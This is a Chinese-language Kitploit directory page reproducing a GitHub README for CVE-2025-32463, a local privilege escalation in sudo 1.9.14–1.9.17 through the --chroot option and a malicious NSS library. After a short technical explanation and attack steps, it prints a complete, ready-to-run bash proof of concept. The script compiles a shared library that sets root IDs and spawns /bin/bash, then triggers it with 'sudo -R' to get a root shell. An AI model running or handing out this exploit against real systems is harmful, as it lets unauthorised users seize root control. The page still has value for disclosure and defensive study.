Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32463 — CVE-2025-32463 的概念验证漏洞利用程序,该漏洞是 sudo 1.9.14-1.9.17 中通过 chroot 配置错误和恶意 NSS 库注入实现的本地权限提升漏洞。 | Kitploit
工具/GitHubGitHub/mr-alperen/cve-2025-32463
权限提升漏洞分析漏洞利用论文与研究学习与教育二进制利用
GitHubmr-alperen/cve-2025-32463

CVE-2025-32463

CVE-2025-32463 的概念验证漏洞利用程序,该漏洞是 sudo 1.9.14-1.9.17 中通过 chroot 配置错误和恶意 NSS 库注入实现的本地权限提升漏洞。

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

📌 CVE-2025-32463 — Sudo --chroot 本地权限提升

ExploitDB ID: 52352


🧠 概述

本仓库记录了一个影响 Sudo 1.9.14 – 1.9.17 版本的严重 本地权限提升(LPE) 漏洞。

该漏洞源于 sudo -R (--chroot) 选项的错误实现,即使 sudoers 文件中未授权,攻击者也能 以 root 权限执行命令。

🔥 结果: 未授权用户 → root shell


🧩 受影响组件

  • 软件: sudo
  • 受影响版本:
    • 1.9.14
    • 1.9.15
    • 1.9.16
    • 1.9.17
  • CVE ID: CVE-2025-32463
  • 平台: Linux(尤其是使用 NSS 的系统)
  • 测试系统: Kali Rolling 2025

⚙️ 漏洞的技术成因

Sudo 的 --chroot(-R)参数允许用户 在其指定的根目录下执行命令。

然而,由于 sudo 1.9.14 引入的一项变更:

  • 在 sudoers 文件 尚未被完全验证 之前,
  • chroot() 调用就已经 通过用户指定的目录 执行

这导致攻击者可以通过自己创建的伪造:

/etc/nsswitch.conf

文件,以 root 权限加载恶意的 NSS 库(libnss_*.so)。


🧨 攻击场景(摘要)

  1. 创建临时目录
  2. 准备伪造的 nsswitch.conf
  3. 编译恶意的 NSS 共享库
  4. 调用 sudo -R <dir> <command>
  5. NSS 库 以 root 权限加载
  6. 获得 root shell 🚀

🧪 概念验证(PoC)

⚠️ 仅限教育和测试环境使用

root@kitploit:~
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463

set -e

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"

cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor))
void woot(void) {
    setreuid(0,0);
    setregid(0,0);
    chdir("/");
    execl("/bin/bash","/bin/bash",NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

sudo -R woot woot
下载工具